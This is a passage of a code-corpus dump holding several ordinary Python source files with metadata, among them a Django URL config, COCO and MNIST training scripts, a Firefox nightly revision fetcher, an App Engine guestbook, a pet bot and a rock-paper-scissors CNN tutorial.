9, "usage_type": "name"}, {"api_name": "pug2d.box2d.Box2DLevel", "line_number": 11, "usage_type": "name"}, {"api_name": "pug2d.core.Layer", "line_number": 14, "usage_type": "call"}, {"api_name": "pug2d.core", "line_number": 14, "usage_type": "name"}, {"api_name": "Box2D.b2.polygonShape", "line_number": 19, "usage_type": "call"}, {"api_name": "Box2D.b2", "line_number": 19, "usage_type": "name"}, {"api_name": "sf.Texture.load_from_file", "line_number": 22, "usage_type": "call"}, {"api_name": "sf.Texture", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sf.Sprite", "line_number": 24, "usage_type": "call"}, {"api_name": "pug2d.core.Actor", "line_number": 27, "usage_type": "call"}, {"api_name": "pug2d.core", "line_number": 27, "usage_type": "name"}, {"api_name": "pug2d.box2d.Updater", "line_number": 30, "usage_type": "call"}, {"api_name": "pug2d.actions.DefferedCall", "line_number": 34, "usage_type": "call"}, {"api_name": "pug2d.actions", "line_number": 34, "usage_type": "name"}, {"api_name": "pug2d.box2d.PPM", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pug2d.box2d", "line_number": 37, "usage_type": "name"}, {"api_name": "pug2d.box2d.can_see", "line_number": 39, "usage_type": "call"}, {"api_name": "pug2d.box2d.can_see", "line_number": 41, "usage_type": "call"}, {"api_name": "pug2d.core.Game", "line_number": 44, "usage_type": "call"}, {"api_name": "pug2d.core", "line_number": 44, "usage_type": "name"}, {"api_name": "Box2D.b2.world", "line_number": 45, "usage_type": "call"}, {"api_name": "Box2D.b2", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "622824709", "text": "from django.conf.urls import url\nfrom . import views\n \nurlpatterns = [\n # ex: /team_server/\n url(r'^$',views.index, name = 'index'),\n # ex: /team_server/test_form\n url(r'^test_form/$', views.test_form, name='test_form'),\n # ex: /team_server/test_form2\n url(r'^test_form2/$', views.test_form2, name='test_form2'),\n # ex: /team_server/video_face_analysis\n url(r'^video_face_analysis/$', views.video_face_analysis, name='video_face_analysis'),\n\n\n\n\n # ex: /team_server/webcam\n url(r'^webcam/$', views.webcam, name='webcam'),\n # ex: /team_server/sending\n url(r'^sending/$', views.sending, name='sending'),\n]\n\n\n\n\n", "sub_path": "mlservice/team_server/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 643, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "245439569", "text": "import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport random\nif __name__ != '__main__':\n from datasets.utils import *\nelse:\n from utils import *\n\n\nclass Dataset(torchvision.datasets.coco.CocoDetection):\n name_table = ['background', \n 'person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',\n 'train', 'truck', 'boat', 'traffic light', 'fire hydrant',\n 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',\n 'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',\n 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',\n 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',\n 'baseball glove', 'skateboard', 'surfboard', 'tennis racket',\n 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',\n 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',\n 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',\n 'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',\n 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',\n 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',\n 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush']\n\n def __init__(self, root_img, file_json, size, normalize, transfer_p, transfer_min):\n super(Dataset, self).__init__(root_img, file_json)\n assert size%2 == 1\n self.root_img = root_img\n self.file_json = file_json\n self.size = size\n self.normalize = normalize\n self.transfer_p = transfer_p\n self.transfer_min = transfer_min\n # other\n self.task = 'bbox'\n self.normalizer = transforms.Normalize((0.485,0.456,0.406), (0.229,0.224,0.225))\n # name_table\n self.index_to_coco = [i for i in range(len(self.name_table))]\n self.coco_to_index = {}\n for cate in self.coco.loadCats(self.coco.getCatIds()):\n name = cate['name']\n if name in self.name_table:\n index = self.name_table.index(name)\n self.index_to_coco[index] = cate['id']\n self.coco_to_index[cate['id']] = index\n # filter self.ids\n ids = []\n for img_id in self.ids:\n img_info = self.coco.loadImgs(img_id)[0]\n height, width = img_info['height'], img_info['width']\n if min(height, width) < 32: continue\n ann_ids = self.coco.getAnnIds(imgIds=img_id, iscrowd=False)\n anno = self.coco.loadAnns(ann_ids)\n if len(filter_annotation(anno, self.coco_to_index, height, width))>0:\n ids.append(img_id)\n self.ids = ids\n \n def __len__(self):\n return len(self.ids)\n\n def __getitem__(self, idx):\n '''\n Return:\n img: F(3, size, size)\n location: F(5)\n boxes: F(n, 4)\n labels: L(n)\n '''\n img, anno = super(Dataset, self).__getitem__(idx)\n anno = filter_annotation(anno, self.coco_to_index, img.size[1], img.size[0])\n boxes = [obj['bbox'] for obj in anno]\n boxes = torch.as_tensor(boxes).reshape(-1, 4) # guard against no boxes\n xmin_ymin, w_h = boxes.split([2, 2], dim=1)\n xmax_ymax = xmin_ymin + w_h - 1\n xmin, ymin = xmin_ymin.split([1, 1], dim=1)\n xmax, ymax = xmax_ymax.split([1, 1], dim=1)\n boxes = torch.cat([ymin, xmin, ymax, xmax], dim=1)\n labels = [self.coco_to_index[obj['category_id']] for obj in anno]\n labels = torch.LongTensor(labels)\n # clamp\n boxes[:, :2].clamp_(min=0)\n boxes[:, 2].clamp_(max=float(img.size[1])-1)\n boxes[:, 3].clamp_(max=float(img.size[0])-1)\n # transform\n if random.random() < 0.5: img, boxes, _ = x_flip(img, boxes)\n img, location, boxes, _ = to_square(img, self.size, \n self.transfer_p, self.transfer_min, boxes)\n img = transforms.ToTensor()(img)\n if self.normalize: img = self.normalizer(img)\n return img, location, boxes, labels\n\n def collate_fn(self, data):\n '''\n Return:\n imgs: F(b, 3, size, size)\n locations: F(b, 5)\n boxes: F(b, max_n, 4)\n labels: L(b, max_n) bg:0\n '''\n imgs, locations, boxes, labels = zip(*data)\n imgs = torch.stack(imgs)\n locations = torch.stack(locations)\n batch_num = len(imgs)\n max_n = 0\n for b in range(batch_num):\n if boxes[b].shape[0] > max_n: max_n = boxes[b].shape[0]\n boxes_t = torch.zeros(batch_num, max_n, 4)\n labels_t = torch.zeros(batch_num, max_n).long()\n for b in range(batch_num):\n boxes_t[b, :boxes[b].shape[0]] = boxes[b]\n labels_t[b, :boxes[b].shape[0]] = labels[b]\n return {'imgs':imgs, 'locations':locations, \n 'boxes':boxes_t, 'labels':labels_t}\n\n\nif __name__ == '__main__':\n root_img = 'D:\\\\dataset\\\\microsoft-coco\\\\val2017'\n file_json = 'D:\\\\dataset\\\\microsoft-coco\\\\instances_val2017.json'\n size = 641\n normalize = False\n transfer_p = 1.0\n transfer_min = 0.5\n batch_size = 4\n dataset = Dataset(root_img, file_json, size, normalize, \n transfer_p, transfer_min)\n loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True, \n num_workers=0, collate_fn=dataset.collate_fn)\n for data in loader:\n imgs, locations, boxes, labels = data['imgs'], \\\n data['locations'], data['boxes'], data['labels']\n print('imgs:', imgs.shape)\n print('locations:', locations.shape)\n print('boxes:', boxes.shape)\n print('labels:', labels.shape)\n b = random.randint(0, batch_size-1)\n show_instance(imgs[b], boxes[b], labels[b], name_table=dataset.name_table)\n break\n", "sub_path": "datasets/mscoco_bbox.py", "file_name": "mscoco_bbox.py", "file_ext": "py", "file_size_in_byte": 5996, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torchvision.datasets", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 39, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.as_tensor", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 82, "usage_type": "call"}, {"api_name": "random.random", "line_number": 88, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 111, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "615757772", "text": "#\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\n#\nimport utility as u\nimport constant as c\n\n\n# # # Data preprocessing\n# load the data\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# show examples\nu.example_show(x_train[:9, :, :], y_train[:9])\n\n# reshape\nx_train = x_train.reshape(c.num_train_imgs, c.img_size, c.img_size, 1)\nx_test = x_test.reshape(c.num_test_imgs, c.img_size, c.img_size, 1)\n\n# normalize the images\nX_train = u.normalize_images(x_train)\nX_test = u.normalize_images(x_test)\n\n# one-hot formate for the target matrices\nY_train = np_utils.to_categorical(y_train, c.num_classes)\nY_test = np_utils.to_categorical(y_test, c.num_classes)\n\n# # # Build the neural network with Keras API\n# structure of the neural network\nmodel = Sequential()\n\nmodel.add(Convolution2D(nb_filter=c.num_filters,\n nb_row=c.kernel_size[0],\n nb_col=c.kernel_size[1],\n border_mode='valid',\n input_shape=c.shape_input))\nmodel.add(Activation('relu'))\nmodel.add(Convolution2D(nb_filter=c.num_filters,\n nb_row=c.kernel_size[0],\n nb_col=c.kernel_size[1]))\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=c.pool_size))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(c.num_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=[\"accuracy\"])\n\n# # # Train the model!\nmodel.fit(X_train, Y_train,\n batch_size=c.batch_size,\n nb_epoch=c.num_episode,\n show_accuracy=True,\n verbose=1,\n validation_data=(X_test, Y_test))\n\n# # # Evaluate its performance\nscore = model.evaluate(X_test, Y_test,\n show_accuracy=True,\n verbose=0)\n\n\nprint('Test Score:{0}'.format(score[0]))\nprint('Test Accuracy:{0}'.format(score[1]))", "sub_path": "Examples/MNIST_CNN/keras_run.py", "file_name": "keras_run.py", "file_ext": "py", "file_size_in_byte": 2168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 14, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 14, "usage_type": "name"}, {"api_name": "utility.example_show", "line_number": 17, "usage_type": "call"}, {"api_name": "constant.num_train_imgs", "line_number": 20, "usage_type": "attribute"}, {"api_name": "constant.img_size", "line_number": 20, "usage_type": "attribute"}, {"api_name": "constant.num_test_imgs", "line_number": 21, "usage_type": "attribute"}, {"api_name": "constant.img_size", "line_number": 21, "usage_type": "attribute"}, {"api_name": "utility.normalize_images", "line_number": 24, "usage_type": "call"}, {"api_name": "utility.normalize_images", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 28, "usage_type": "name"}, {"api_name": "constant.num_classes", "line_number": 28, "usage_type": "attribute"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 29, "usage_type": "name"}, {"api_name": "constant.num_classes", "line_number": 29, "usage_type": "attribute"}, {"api_name": "keras.models.Sequential", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 35, "usage_type": "call"}, {"api_name": "constant.num_filters", "line_number": 35, "usage_type": "attribute"}, {"api_name": "constant.kernel_size", "line_number": 36, "usage_type": "attribute"}, {"api_name": "constant.kernel_size", "line_number": 37, "usage_type": "attribute"}, {"api_name": "constant.shape_input", "line_number": 39, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Activation", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 41, "usage_type": "call"}, {"api_name": "constant.num_filters", "line_number": 41, "usage_type": "attribute"}, {"api_name": "constant.kernel_size", "line_number": 42, "usage_type": "attribute"}, {"api_name": "constant.kernel_size", "line_number": 43, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Activation", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 46, "usage_type": "call"}, {"api_name": "constant.pool_size", "line_number": 46, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Dropout", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.core.Flatten", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.layers.core.Dropout", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 53, "usage_type": "call"}, {"api_name": "constant.num_classes", "line_number": 53, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Activation", "line_number": 54, "usage_type": "call"}, {"api_name": "constant.batch_size", "line_number": 60, "usage_type": "attribute"}, {"api_name": "constant.num_episode", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "551835259", "text": "from requests.adapters import HTTPAdapter\nfrom requests_futures.sessions import FuturesSession\nfrom pprint import pprint\nimport re\n\nclass FXRevision(object):\n\n ARCHIVES_URL = 'http://archive.mozilla.org'\n NIGHTLY_URL = ARCHIVES_URL + '/pub/firefox/nightly/'\n TIMEOUT = 5\n MAX_RETRIES = 5\n\n def __init__(self, versions, fx_version, os):\n self.results = [ ]\n self.dates = { }\n self.fx_version = fx_version\n self.os = os\n self.info = { }\n pattern = re.compile('([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})')\n for version in versions:\n m = pattern.search(version)\n self.dates[version] = [m.group(i) for i in range(1, 7)]\n\n self.session = FuturesSession()\n self.session.mount(self.ARCHIVES_URL, HTTPAdapter(max_retries = self.MAX_RETRIES))\n self.__get_info()\n\n def get(self):\n for r in self.results:\n r.result()\n return self.info\n \n def __make_url(self, l):\n return self.NIGHTLY_URL + l[0] + '/' + l[1] + '/' + '-'.join(l) + '-mozilla-central/firefox-' + self.fx_version + '.en-US.' + self.os + '.json'\n\n def __info_cb(self, sess, res):\n json = res.json()\n self.info[json['buildid']] = json['moz_source_stamp']\n \n def __get_info(self):\n for date in self.dates.itervalues():\n self.results.append(self.session.get(self.__make_url(date),\n timeout = self.TIMEOUT,\n background_callback = self.__info_cb))\n\n#fxr = FXRevision(['20160223030304'], '47.0a1', 'linux-i686')\n#pprint(fxr.get())\n \n# 2016/02/2016-02-23-03-03-04-mozilla-central/firefox-47.0a1.en-US.linux-i686.txt'\n", "sub_path": "FXRevision.py", "file_name": "FXRevision.py", "file_ext": "py", "file_size_in_byte": 1781, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 19, "usage_type": "call"}, {"api_name": "requests_futures.sessions.FuturesSession", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.adapters.HTTPAdapter", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "555328250", "text": "# -*- coding: utf8 -*- #\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom tools.baserequest import BaseRequestHandler\nfrom tools.paging import Paging\nfrom tools.database import GbDB\n\nfrom google.appengine.ext.webapp.util import login_required\n\nclass GuestBook(BaseRequestHandler):\n def get(self):\n user = users.get_current_user()\n if user:\n form = True\n else:\n form = False\n\n if self.request.GET:\n show = self.request.get('show')\n if show == '':\n show = 0\n else:\n show = Paging().Test_page(show)\n else:\n show = 0\n show = int(show)\n\n greetings_query = GbDB.all().order('-date')\n paging = Paging().page(greetings_query, show)\n greetings = greetings_query.fetch(10, show)\n\n template_values = {\n 'paging':paging,\n 'greetings': greetings,\n 'form': form,\n }\n\n self.generate('guestbook.html', template_values, razdel = 'guestbook', logo = 'logo', title = 'Гостевая');\n\nclass GuestOtvet(BaseRequestHandler):\n @login_required\n def get(self):\n user = users.get_current_user()\n if user:\n if self.request.get('postid'):\n post = GbDB.get_by_id(int(self.request.get('postid')))\n if post:\n template_values = {\n 'greeting': post,\n }\n self.generate('guestbook.otvet.html', template_values, razdel = '', logo = 'logo', title = 'Гостевая');\n else:\n self.redirect(\"/guestbook\")\n else:\n self.redirect(\"/guestbook\")\n else:\n self.redirect(\"/guestbook\")\n\nclass GuestCit(BaseRequestHandler):\n @login_required\n def get(self):\n user = users.get_current_user()\n if user:\n if self.request.get('postid'):\n post = GbDB.get_by_id(int(self.request.get('postid')))\n if post:\n template_values = {\n 'greeting': post,\n }\n self.generate('guestbook.cit.html', template_values, razdel = '', logo = 'logo', title = 'Гостевая');\n else:\n self.redirect(\"/guestbook\")\n else:\n self.redirect(\"/guestbook\")\n else:\n self.redirect(\"/guestbook\")\n\n\nclass GuestPost(webapp.RequestHandler):\n def post(self):\n user = users.get_current_user()\n if user:\n greeting = GbDB()\n greeting.author = user.nickname()\n if self.request.get('content'):\n content = self.request.get('content')\n greeting.content = content\n numchars = content.__len__()\n if numchars > 0 and numchars <= 1000:\n greeting.put()\n self.redirect('/guestbook')\n else:\n self.redirect(\"/guestbook\")\n\nclass GBAdmin(webapp.RequestHandler):\n @login_required\n def get(self):\n if users.is_current_user_admin():\n if self.request.GET:\n greetings = GbDB()\n if self.request.get('delgb'):\n greetings = GbDB.get_by_id(int(self.request.get('delgb')))\n greetings.delete()\n self.redirect(\"/guestbook\")", "sub_path": "guestbook.py", "file_name": "guestbook.py", "file_ext": "py", "file_size_in_byte": 3479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tools.baserequest.BaseRequestHandler", "line_number": 10, "usage_type": "name"}, {"api_name": "google.appengine.api.users.get_current_user", "line_number": 12, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 12, "usage_type": "name"}, {"api_name": "tools.paging.Paging", "line_number": 23, "usage_type": "call"}, {"api_name": "tools.database.GbDB.all", "line_number": 28, "usage_type": "call"}, {"api_name": "tools.database.GbDB", "line_number": 28, "usage_type": "name"}, {"api_name": "tools.paging.Paging", "line_number": 29, "usage_type": "call"}, {"api_name": "tools.baserequest.BaseRequestHandler", "line_number": 40, "usage_type": "name"}, {"api_name": "google.appengine.api.users.get_current_user", "line_number": 43, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 43, "usage_type": "name"}, {"api_name": "tools.database.GbDB.get_by_id", "line_number": 46, "usage_type": "call"}, {"api_name": "tools.database.GbDB", "line_number": 46, "usage_type": "name"}, {"api_name": "google.appengine.ext.webapp.util.login_required", "line_number": 41, "usage_type": "name"}, {"api_name": "tools.baserequest.BaseRequestHandler", "line_number": 59, "usage_type": "name"}, {"api_name": "google.appengine.api.users.get_current_user", "line_number": 62, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 62, "usage_type": "name"}, {"api_name": "tools.database.GbDB.get_by_id", "line_number": 65, "usage_type": "call"}, {"api_name": "tools.database.GbDB", "line_number": 65, "usage_type": "name"}, {"api_name": "google.appengine.ext.webapp.util.login_required", "line_number": 60, "usage_type": "name"}, {"api_name": "google.appengine.ext.webapp.RequestHandler", "line_number": 79, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.webapp", "line_number": 79, "usage_type": "name"}, {"api_name": "google.appengine.api.users.get_current_user", "line_number": 81, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 81, "usage_type": "name"}, {"api_name": "tools.database.GbDB", "line_number": 83, "usage_type": "call"}, {"api_name": "google.appengine.ext.webapp.RequestHandler", "line_number": 95, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.webapp", "line_number": 95, "usage_type": "name"}, {"api_name": "google.appengine.api.users.is_current_user_admin", "line_number": 98, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 98, "usage_type": "name"}, {"api_name": "tools.database.GbDB", "line_number": 100, "usage_type": "call"}, {"api_name": "tools.database.GbDB.get_by_id", "line_number": 102, "usage_type": "call"}, {"api_name": "tools.database.GbDB", "line_number": 102, "usage_type": "name"}, {"api_name": "google.appengine.ext.webapp.util.login_required", "line_number": 96, "usage_type": "name"}]} +{"seq_id": "550776622", "text": "import datetime\nimport shelve\nimport utils\n\nutils.check_path(\"data\")\n\ntick = datetime.timedelta(minutes=40)\n\nmaxFood = 30\nmaxHappy = 30\n\nfoodGain = 6\nhappyGain = 6\n\ndbname = 'data/pets'\n\nclass Pet:\n\tdef __init__(self):\n\t\tself.food = 0\n\t\tself.happy = 0\n\t\tself.lastCheck = datetime.datetime.now()\n\n\tdef feed(self):\n\t\tself.update()\n\t\tif (self.food < maxFood):\n\t\t\tself.food = min(maxFood, self.food + foodGain)\n\t\t\treturn 'You offer the wizard\\'s familiar a treat from your pocket. She takes it and retreats to her perch.' + self.render()\n\t\treturn 'You offer the wizard\\'s familiar a treat from your pocket, but she seems full.' + self.render()\n\n\tdef pet(self):\n\t\tself.update()\n\t\tfactor = self.food/maxFood\n\t\tmessage = ''\n\t\tif factor < 0.3:\n\t\t\tmessage = 'You try to pet the wizard\\'s familiar. She tries to bite your hand. Perhaps she\\'s hungry?'\n\t\telif factor < 0.75:\n\t\t\tmessage = 'You scratch the wizard\\'s familiar under the chin. She chitters contentedly.'\n\t\telse:\n\t\t\tmessage = 'The wizard\\'s familiar rubs against you, trilling happily.'\n\t\tself.happy = min(maxHappy, int(self.happy + (happyGain * factor)))\n\t\treturn message + '\\n' + self.render()\n\n\tdef render(self):\n\t\treturn '```\\nFamiliar:\\n Fed:\\n' + utils.drawGauge(self.food, maxFood) + '\\n Happiness:\\n' + utils.drawGauge(self.happy, maxHappy) + '\\n```'\n\n\tdef update(self):\n\t\ttemp = self.lastCheck + tick\n\t\tif temp < datetime.datetime.now():\n\t\t\tself.lastCheck = datetime.datetime.now()\n\t\twhile temp < datetime.datetime.now():\n\t\t\ttemp += tick\n\t\t\tself.food = max(0, self.food - 1)\n\t\t\tself.happy = max(0, self.food - 1)\n\nwith shelve.open(dbname) as db:\n\tif 'mainPet' in db:\n\t\tmyPet = db['mainPet']\n\telse:\n\t\tmyPet = Pet()\n\ndef feed():\n\tmessage = myPet.feed()\n\twith shelve.open(dbname) as db:\n\t\tdb['mainPet'] = myPet\n\treturn message\n\ndef pet():\n\tmessage = myPet.pet()\n\twith shelve.open(dbname) as db:\n\t\tdb['mainPet'] = myPet\n\treturn message", "sub_path": "pet.py", "file_name": "pet.py", "file_ext": "py", "file_size_in_byte": 1891, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.check_path", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "utils.drawGauge", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}, {"api_name": "shelve.open", "line_number": 55, "usage_type": "call"}, {"api_name": "shelve.open", "line_number": 63, "usage_type": "call"}, {"api_name": "shelve.open", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "256279851", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 9 09:07:51 2020\n\n@author: jenny\n\"\"\"\n\nimport os\nimport zipfile\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.optimizers import RMSprop\nimport matplotlib.pyplot as plt\n\n# # extract zip file\n# # # dataset found here: http://www.laurencemoroney.com/rock-paper-scissors-dataset/\n# zip_file = \"rps.zip\"\n# zip_ref = zipfile.ZipFile(zip_file, 'r')\n# zip_ref.extractall()\n# zip_ref.close()\n\n# zip_file = \"rps-test-set.zip\"\n# zip_ref = zipfile.ZipFile(zip_file, 'r')\n# zip_ref.extractall()\n# zip_ref.close()\n\n# use CNN with rock/paper/sissor dataset\ntrain_dir = \"rps/\"\n\n# ImageDataGenerator is a image generator that generates new augmented images from original\n# images at RUNTIME.\n# First, create an image generator object and specify how to generate image:\n# Ex: rotate, whitening, shear, shift, flip, rescale, ...\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n featurewise_center=True,\n rotation_range=30,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest'\n )\n\n# Then, load the original image from directory and subdirectories:\n# SHOULD point to directory that has subdirectories that has all the labelled data.\n# Name of subdirectory should be the label name so that ImageDataGenerator can automatically\n# generate image+label dataset:\n# EX:\n# DIR---TRAIN----Label1----image1.jpg, image2.jpg, ...\n# | |----Label2----ImgA.jpg, ImgB.jpg, ...\n# |----TEST-----Label1----red.jpg, yel.jpg, ...\n# |----Label2----A.jpg, B.jpg, ...\n#\n# flow_from_directory(DIR, ...) to load image from OS\n# flow(X, Y, ...) to load image in IDE\ntrain_generator = train_datagen.flow_from_directory(\n train_dir, # Points to the dir that has the labelled subdirectories\n target_size=(150,150), # Original image size is (300, 300), resized to (150, 150)\n # at runtime when loaded and not affecting the original image\n class_mode='categorical' # others: \"binary\"\n# batch_size=128 # images are loaded in batches during training and testing,\n# # which is more efficient than loading image one by one\n)\n\ntest_dir = \"rps-test-set/\"\n# Test data just need to normalized/rescale to fit with model\ntest_datagen = ImageDataGenerator(rescale=1./255)\ntest_generator = test_datagen.flow_from_directory(\n test_dir,\n target_size=(150,150),\n class_mode='categorical'\n)\n\nmodel = Sequential([\n Conv2D(64, (3,3), activation='relu', input_shape=(150,150,3)),\n MaxPooling2D(pool_size=(2,2)),\n Conv2D(64, (3,3), activation='relu'),\n MaxPooling2D(pool_size=(2,2)),\n Conv2D(128, (3,3), activation='relu'),\n MaxPooling2D(pool_size=(2,2)),\n Conv2D(128, (3,3), activation='relu'),\n MaxPooling2D(pool_size=(2,2)),\n Flatten(),\n Dropout(0.5),\n Dense(512, activation='relu'),\n Dense(3, activation='softmax')\n])\nmodel.compile(loss='categorical_crossentropy',\n optimizer=RMSprop(lr=0.01),\n metrics=['accuracy'])\nmodel.summary()\n\"\"\"\nModel: \"sequential_1\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d_4 (Conv2D) (None, 148, 148, 64) 1792 \n_________________________________________________________________\nmax_pooling2d_4 (MaxPooling2 (None, 74, 74, 64) 0 \n_________________________________________________________________\nconv2d_5 (Conv2D) (None, 72, 72, 64) 36928 \n_________________________________________________________________\nmax_pooling2d_5 (MaxPooling2 (None, 36, 36, 64) 0 \n_________________________________________________________________\nconv2d_6 (Conv2D) (None, 34, 34, 128) 73856 \n_________________________________________________________________\nmax_pooling2d_6 (MaxPooling2 (None, 17, 17, 128) 0 \n_________________________________________________________________\nconv2d_7 (Conv2D) (None, 15, 15, 128) 147584 \n_________________________________________________________________\nmax_pooling2d_7 (MaxPooling2 (None, 7, 7, 128) 0 \n_________________________________________________________________\nflatten_1 (Flatten) (None, 6272) 0 \n_________________________________________________________________\ndropout_1 (Dropout) (None, 6272) 0 \n_________________________________________________________________\ndense_2 (Dense) (None, 512) 3211776 \n_________________________________________________________________\ndense_3 (Dense) (None, 3) 1539 \n=================================================================\nTotal params: 3,473,475\nTrainable params: 3,473,475\nNon-trainable params: 0\n\"\"\"\nhistory = model.fit(train_generator, epochs=15, validation_data=test_generator)\n\"\"\"\nEpoch 15/15\n79/79 [==============================] - 38s 481ms/step \n- loss: 0.0701 - accuracy: 0.9786 - val_loss: 0.0413 - val_accuracy: 0.9812\n\"\"\"\n\"\"\"\n# Alternative training method:\n# ImageDataGenerator loads images in batches of size=batch_size.\n# steps_per_epoch in model.fit() is the number of batches to yield from generator\n# before declaring one epoch finished.\n# --> steps_per_epoch = ceil( len(training_set)/batch_size )\n#\nhistory = model.fit(train_generator, steps_per_epoch=8, epochs=15,\n validation_data=test_generator, validation_steps=8)\n\n# Here's a more \"manual\" example without using 